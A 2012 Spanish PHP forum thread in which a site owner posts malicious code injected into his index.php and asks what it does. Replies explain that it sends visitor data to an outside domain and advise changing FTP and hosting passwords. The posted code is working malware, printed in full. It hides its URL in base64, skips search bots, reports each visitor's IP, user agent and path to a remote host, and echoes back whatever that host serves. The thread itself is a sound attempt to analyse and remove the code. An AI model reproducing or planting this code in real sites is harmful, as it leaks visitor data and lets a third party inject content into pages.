Foros del Web » Programando para Internet » PHP »

Me han insertado código ¿Qué hace?

Estas en el tema de Me han insertado código ¿Qué hace? en el foro de PHP en Foros del Web. Hola de repente en mis webs aparecio en su index.php este codigo Código PHP: <?php if (!isset( $sRetry )) { global  $sRetry ; $sRetry  =  1 ...
  #1 (permalink)  
Antiguo 17/03/2012, 11:27
Avatar de fieroso  
Fecha de Ingreso: diciembre-2009
Mensajes: 127
Antigüedad: 14 años, 11 meses
Puntos: 1
Me han insertado código ¿Qué hace?

Hola de repente en mis webs aparecio en su index.php este codigo

Código PHP:
<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
Me costó dar con el fallo porque me resultaba extraño que cargara en chrome y firefox no.

Me gustaria saber que es lo que hace ese código, para saber lo que ha hecho las pocas horas que ha estado ejecutándose y como evitar que me lo vuelvan a introducir.

gracias de antemano
  #2 (permalink)  
Antiguo 17/03/2012, 11:58
Avatar de Chico3001  
Fecha de Ingreso: septiembre-2011
Ubicación: Mexico, DF
Mensajes: 112
Antigüedad: 13 años, 2 meses
Puntos: 12
Respuesta: Me han insertado código ¿Qué hace?

Segun lo poco que estuve revisando guarda estadisticas de quien acceso a la pagina y las envia a la direccion adveconfirm.com

Para ayudarte a evitar que lo vuelvan a introducir, primero hay que revisar como se metieron... y para eso hay que revisar todos los scripts que tengas en linea en ese servidor

Comienza por lo mas basico, cambia las contraseñas de acceso al panel de control y FTP, despues hay que revisar si tus scripts php tienen proteccion contra inyecciones SQL y XSS

Edit: si tienes un BLOG en linea esta informacion te puede servir:

http://www.dotblag.com/2012/03/12/wo...og-infections/
  #3 (permalink)  
Antiguo 17/03/2012, 19:46
Avatar de gildus  
Fecha de Ingreso: agosto-2003
Mensajes: 1.495
Antigüedad: 21 años, 3 meses
Puntos: 105
Respuesta: Me han insertado código ¿Qué hace?

Holas,

Esta enviando datos me imagino que para analisis o reportes estadisticos a:
Envia datos de quien visita, que navegador usa, de donde viene, la ip, etc. Si no estas de acuerdo lo podrias quitar y no deberia de pasar nada. Si estas deacuerdo pues dejalos asi.


Segun veo y lo abri ese dominio y el firefox lo muestra como pantalla roja y como sitio atacante. Por seacaso cambia los accesos de hosting, correos, etc.

Saludos
__________________
.: Gildus :.
  #4 (permalink)  
Antiguo 17/03/2012, 21:17
 
Fecha de Ingreso: abril-2008
Mensajes: 67
Antigüedad: 16 años, 7 meses
Puntos: 0
Respuesta: Me han insertado código ¿Qué hace?

Lo que hice cuando cambiaron mi pagina de inicio de mi web, fue cambiar la contraseña y las preguntas secretas de mi cuenta de email (en yahoo) en la que tenia el mensaje con la contraseña de mi hosting.

Resulto que habian entrado a mi cuenta de yahoo y de ahi accedieron a mi cuenta de usuario de hosting... ojala y te sirva esta informacion..
  #5 (permalink)  
Antiguo 18/03/2012, 04:59
Avatar de fieroso  
Fecha de Ingreso: diciembre-2009
Mensajes: 127
Antigüedad: 14 años, 11 meses
Puntos: 1
Respuesta: Me han insertado código ¿Qué hace?

gracias a todos
  #6 (permalink)  
Antiguo 18/03/2012, 12:48
 
Fecha de Ingreso: noviembre-2002
Mensajes: 746
Antigüedad: 22 años
Puntos: 6
Respuesta: Me han insertado código ¿Qué hace?

ese tipo de insercion se hace por ftp, es un 'virus' que tienes en el pc que envia las claves y un robot accede al tu site y mete ese codigo PHP, pero tambien mete un JS en las paginas html, asi que buscalo y eliminalo tambien..

yo he tenido que reparar muchos sitios infectados asi, asi que se de que hablo.


1º arregla tu pc
2º cambia las claves del ftp
3º limpia tu codigo
  #7 (permalink)  
Antiguo 25/06/2012, 06:47
 
Fecha de Ingreso: febrero-2007
Mensajes: 39
Antigüedad: 17 años, 9 meses
Puntos: 0
Respuesta: Me han insertado código ¿Qué hace?

Cita:
Iniciado por suntus Ver Mensaje
ese tipo de insercion se hace por ftp, es un 'virus' que tienes en el pc que envia las claves y un robot accede al tu site y mete ese codigo PHP, pero tambien mete un JS en las paginas html, asi que buscalo y eliminalo tambien..

yo he tenido que reparar muchos sitios infectados asi, asi que se de que hablo.


1º arregla tu pc
2º cambia las claves del ftp
3º limpia tu codigo
Buenas, a mi tb me ha entrado este virus, he limpiado el codigo php de la web. Pero AVG me sigue diciendo que tengo virus, me podrías decir cual es el código JS o que estructura que tiene, por favor.
Gracias

Etiquetas: insertado
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:05.